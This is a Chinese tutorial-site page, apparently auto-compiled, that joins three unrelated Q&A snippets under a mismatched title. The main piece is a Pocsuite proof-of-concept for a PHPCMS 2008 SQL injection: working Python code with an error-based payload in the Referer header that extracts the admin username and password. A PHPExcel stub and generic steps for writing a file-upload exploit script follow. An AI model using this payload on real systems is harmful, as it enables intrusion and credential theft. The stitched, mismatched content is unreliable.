好得很程序员自学网
  • 首页
  • 后端语言
    • C#
    • PHP
    • Python
    • java
    • Golang
    • ASP.NET
  • 前端开发
    • Angular
    • react框架
    • LayUi开发
    • javascript
    • HTML与HTML5
    • CSS与CSS3
    • jQuery
    • Bootstrap
    • NodeJS
    • Vue与小程序技术
    • Photoshop
  • 数据库技术
    • MSSQL
    • MYSQL
    • Redis
    • MongoDB
    • Oracle
    • PostgreSQL
    • Sqlite
    • 数据库基础
    • 数据库排错
  • CMS系统
    • HDHCMS
    • WordPress
    • Dedecms
    • PhpCms
    • 帝国CMS
    • ThinkPHP
    • Discuz
    • ZBlog
    • ECSHOP
  • 高手进阶
    • Android技术
    • 正则表达式
    • 数据结构与算法
  • 系统运维
    • Windows
    • apache
    • 服务器排错
    • 网站安全
    • nginx
    • linux系统
    • MacOS
  • 学习教程
    • 前端脚本教程
    • HTML与CSS 教程
    • 脚本语言教程
    • 数据库教程
    • 应用系统教程
  • 新技术
  • 编程导航
    • 区块链
    • IT资讯
    • 设计灵感
    • 建站资源
    • 开发团队
    • 程序社区
    • 图标图库
    • 图形动效
    • IDE环境
    • 在线工具
    • 调试测试
    • Node开发
    • 游戏框架
    • CSS库
    • Jquery插件
    • Js插件
    • Web框架
    • 移动端框架
    • 模块管理
    • 开发社区
    • 在线课堂
    • 框架类库
    • 项目托管
    • 云服务

当前位置:首页>后端语言>PHP
<tfoot draggable='sEl'></tfoot>

如何编写phpexp 如何编写一个小程序

很多站长朋友们都不太清楚如何编写phpexp,今天小编就来给大家整理如何编写phpexp,希望对各位有所帮助,具体内容如下:

本文目录一览: 1、 如何使用python编写poc,exp 2、 PHP 用PHPExcel往数据库导入大量数据 3、 奇安信文件上传漏洞如何编写 如何使用python编写poc,exp

然后来谈谈自己的看法:

其实吧,无论乌云的Tangscan也好,知道创宇的Pocsuite也好,还有Beebeeto也好(Bugscan没写过,不是特别了解不过应该差不多),关于Web的Poc和Exp,都极度依赖于两个Python库。

1. Requests : 模拟Web的请求和响应等交互动作。

2. Re : 正则表达式,用来验证返回的结果是否符合漏洞的预期,从而验证漏洞是否存在。

其余的大部分代码都是漏洞的信息。

Pocsuite官方文档例子:

#!/usr/bin/env python

# coding: utf-8

import re

import urlparse

from t import req

from pocsuite.poc import POCBase, Output

from pocsuite.utils import register

class TestPOC(POCBase):

vulID = '62274' # ssvid

version = '1'

author = ['Medici.Yan']

vulDate = '2011-11-21'

createDate = '2015-09-23'

updateDate = '2015-09-23'

references = ['']

name = '_62274_phpcms_2008_place_sql_inj_PoC'

appPowerLink = ''

appName = 'PHPCMS'

appVersion = '2008'

vulType = 'SQL Injection'

desc = '''

phpcms 2008 中广告模块,存在参数过滤不严,

导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,

如果关闭了错误显示,可以采用基于时间和错误的盲注

'''

samples = ['']

def _attack(self):

result = {}

vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')

payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"

head = {

'Referer': payload

}

resp = req.get(vulurl, headers=head)

if resp.status_code == 200:

match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)

if match_result:

result['AdminInfo'] = {}

result['AdminInfo']['Username'] = match_result.group(1)

result['AdminInfo']['Password'] = match_result.group(2)

return self.parse_attack(result)

def _verify(self):

result = {}

vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')

payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"

head = {

'Referer': payload

}

resp = req.get(vulurl, headers=head)

if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:

result['VerifyInfo'] = {}

result['VerifyInfo']['URL'] = vulurl

result['VerifyInfo']['Payload'] = payload

return self.parse_attack(result)

def parse_attack(self, result):

output = Output(self)

if result:

output.success(result)

else:

output.fail('Internet nothing returned')

return output

register(TestPOC)

可以看到从代码11到28行都是漏洞的一些信息,真正的功能函数只有_attack和_verify两个而已。甚至这个例子有点繁琐了,现在大大们都是把exploit写在verify里面,所以真正起到功能的,也就不到十行的代码。pocsuite.net 这个库其实就是Requests。用Requests模拟手工注入的Post提交,用正则匹配提取和验证必要信息,简单说起来就是这两个步骤。

这么一来你再看看其他的由Python写的Poc和Exp就大同小异了。Poc/Exp总的说来就只是用程序代替手工的过程而已,所以了解了漏洞的原理和认证方法之后就简单了。

代码很简单最主要的,还是对于漏洞的理解。

先说到这里,有空之后再写一些别的。

PHP 用PHPExcel往数据库导入大量数据

1、首先我们准备一个含有数据的Excel表格,表头和数据表中的表字段相对应。

2、在ThinkPHP中引入PHPExcel类库。

3、然后我们编写导入的PHP代码。

4、然后我们编写导出的PHP代码。

5、然后我们进行导出测试发现可以导出即可。

奇安信文件上传漏洞如何编写

奇安信文件上传漏洞如何编写利用脚本?

编写利用脚本的步骤如下:

1. 使用Burp Suite或其他类似的工具,分析网站的网络流量。

2. 查找文件上传的API接口,并通过Burp Suite等工具记录请求参数的结构。

3. 编写一个简单的Python脚本,利用Python的requests库,来模拟文件上传的请求,并将我们自己的文件上传到服务器上。

4. 最后,检查服务器上是否成功上传了文件,如果成功,则说明漏洞存在。

关于如何编写phpexp的介绍到此就结束了,不知道本篇文章是否对您有帮助呢?如果你还想了解更多此类信息,记得收藏关注本站,我们会不定期更新哦。

查看更多关于如何编写phpexp 如何编写一个小程序的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did208874
更新时间:2023-05-03   阅读:23次

上一篇: php怎么输出加号 php中输入语句

下一篇:php的$怎么打 php中符号

最新资料更新

  • 1.imagephp缩放 缩放图像可以改变图像的分辨率吗
  • 2.php编程圆面积 编程实现圆的面积
  • 3.phpcurl带证书 php证书查询系统
  • 4.php提示重复提交 php api防止重复提交
  • 5.图片执行php代码 图片执行php代码是什么
  • 6.免费php空间shery 免费PHP空间 免备案 V52版本
  • 7.phphint插件下载 php 插件系统
  • 8.token验证php Token验证失败异地登陆什么意思
  • 9.php技术都有什么 php技术
  • 10.php网站后台demo php后端模板
  • 11.php键值怎么转换 php字符转换成数字
  • 12.php半角全角 全角半角字符切换
  • 13.bin里面没有php bin里面没有xsync
  • 14.php接收url php接收json数据
  • 15.php7.1des加密 php7 加密
  • 16.phpwhere循环 php中的循环
  • 17.php下载liunx php下载器
  • 18.php教程全局交流 phpunit教程
  • 19.php推荐接口排重 接口 php
  • 20.php提取数组转map php 数组转xml

CopyRight:2016-{hedonghua:year}{hedonghua:sitegs} 备案ICP:湘ICP备09009000号-16 {hedonghua:sitejym}
本站资讯不构成任何建议,仅限于个人分享,参考须谨慎!
本网站对有关资料所引致的错误、不确或遗漏,概不负任何法律责任。
本网站刊载的所有内容(包括但不仅限文字、图片、LOGO、音频、视频、软件、程序等)版权归原作者所有。任何单位或个人认为本网站中的内容可能涉嫌侵犯其知识产权或存在不实内容时,请及时通知本站,予以删除。

网站内容来源于网络分享,如有侵权发邮箱到:kenbest@126.com,收到邮件我们会即时下线处理。
网站框架支持:HDHCMS   51LA统计 百度统计
Copyright © 2018-2025 「好得很程序员自学网」
[ SiteMap ]